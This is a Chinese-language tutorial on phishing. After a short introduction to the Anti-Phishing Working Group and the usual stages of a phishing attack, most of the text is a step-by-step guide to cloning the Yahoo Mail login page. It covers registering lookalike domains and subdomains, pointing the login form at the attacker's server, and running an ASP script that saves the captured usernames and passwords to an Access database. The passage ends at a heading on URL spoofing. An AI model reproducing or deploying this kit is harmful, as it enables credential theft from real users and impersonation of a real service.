網絡釣魚因其嚴重危害網民利益和互聯網信譽體制，越來越多地受到人們的關注，國際上已經成立反網絡釣魚工作小組（APWG，Anti-Phishing Working Group），這是一個聯合機構，擁有大約800名成員，他們來自約490家金融服務公司、技術公司、服務提供商、國家法律執行機構和立法機構，這些機構的職責是向產業股份持有人提供一個保密論壇以討論網絡釣魚問題。反網絡釣魚工作小組通過召開會議以及成員之間的電子形式的討論，努力從硬成本和軟成本兩個方面來定義網絡釣魚的范圍，分享信息和最佳操作模式以消除存在的問題，希望在不久的將來，徹底消滅網絡釣魚陷阱，還給大家一個真誠、誠信的互聯網。

一. 釣魚的原理：

網絡釣魚(Phishing)一詞，是“Fishing”和“Phone”的綜合體，由于黑客始祖起初是以電話作案，所以用“Ph”來取代“F”，創造了”Phishing”,Phishing 發音與 Fishing相同。 “網絡釣魚”就其本身來說，稱不上是一種獨立的攻擊手段，更多的只是詐騙方法，就像現實社會中的一些詐騙一樣。攻擊者利用欺騙性的電子郵件和偽造的Web站點來進行詐騙活動，誘騙訪問者提供一些個人信息，如信用卡號、賬戶用和口令、社保編號等內容（通常主要是那些和財務，賬號有關的信息，以獲取不正當利益），受騙者往往會泄露自己的財務數據。

現在網絡釣魚的技術手段越來越復雜，比如隱藏在圖片中的惡意代碼、鍵盤記錄程序，當然還有和合法網站外觀完全一樣的虛假網站，這些虛假網站甚至連瀏覽器下方的鎖形安全標記都能顯示出來。網絡釣魚的手段越來越狡猾，這里首先介紹一下網絡釣魚的工作流程。通常有五個階段：

圖1

1. 釣魚者入侵初級服務器，竊取用戶的名字和郵件地址

2. 釣魚者發送有針對性質的郵件3. 受害用戶訪問假冒網址

4. 受害用戶提供秘密和用戶信息被釣魚者取得

5. 釣魚者使用受害用戶的身份進入其他網絡服務器

關于惡意垃圾郵件，想必大家都很了解了，這里我們要實現和操作的是第三種，偽造目標網站，使目標用戶訪問假冒網站，從而完成我們的欺騙。

二. 實現方法

下面我們實現一個簡單的網頁釣魚頁面，大家可以根據自己的需要添加和修改。

1.首先我們申請一個空間，在空間上用來存放我們的網頁

2.我們再申請一個域名，為了達到欺騙效果，我們可以申請一些名字和我們要欺騙的網站類似的域名:如: www.yahoo.com  我們申請一個 www.yaho.com等

如果不能申請這些頂級域名的話，我們也可以修改我們的二級域名

如：我們自己的域名是tcbmail.com，我們可以添加一個yahoo.tcbmail.com的二級域名，這樣可以增加欺騙的成功率

將我們的空間地址綁定到我們的域名上

3.選取目標，修改代碼。

下面我們看一下我們要欺騙的目標，這里我們以yahoo為例，其他網站我們也可以采取類似辦法

打開yahoo郵件的主頁：https://login.yahoo.com/config/mail?.intl=us 

圖2

查看其原代碼,我們看到這樣一句話

https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

這句話的意思就是將我們輸入的表單項的值提交到后臺的處理網頁https://login.yahoo.com/config/login?呵呵，這里就給我們提供了機會，我們可以仿造一個yahoo的郵件的主頁，將提交后的頁面換成我們自己的頁面，通過后臺數據庫處理，就可以達到截獲目標帳戶密碼的效果。

下面我們就具體操作一下

將yahoo郵件的主頁保存到本地

將

P>https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

修改為

 {FORM method="post" action="http://我們自己 域名/test.asp"  target=_self}

保存為mail.html

4.編寫test.asp，使其完成將輸入的值存儲到我們對應的數據庫中，這里我們可以直接使用access數據庫利用以下代碼就可以完成我們的目的

<%
dim db,strcon,qq,pass,rs,strSql
qq=Request("username")
pass=Request("passwd")
strcon="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.mappath("pass.mdb")
Set db=Server.createobject("ADODB.connection")
db.open strcon
strSql="INSERT INTO name(name, pass) VALUES('"& qq &"','"& pass &"')" 
db.Execute(strSql)
%>

5.將編輯好的mail.html、test.asp以及我們編輯好的pass.mdb上傳到空間中

訪問http://我們自己的域名/mail.html

是不是就看到yahoo的郵箱主頁

當你輸入用戶名、密碼的時候，對應的輸入已經存儲到我們自己的數據庫pass.mdb中了，欺騙成功.

圖3

當然啦，現在大家的安全意識都比以前強了，如果大家留意我們所發的鏈接時，有些細心的朋友還是會注意到網頁和實際的不同

但是如果你的域名欺騙性比較大的話，你的成功性也會比較大

如：http://mail.yaho.com.cn/mail.html看起來是不是很像

或者添加一個二級域名

如：http://yahoo.duay.com/mail.html也可以起到一個不錯的欺騙效果

如果你申請的域名類似于www.tiger.com那我們該如何處理呢？

下面再簡單介紹幾種URL欺騙的方法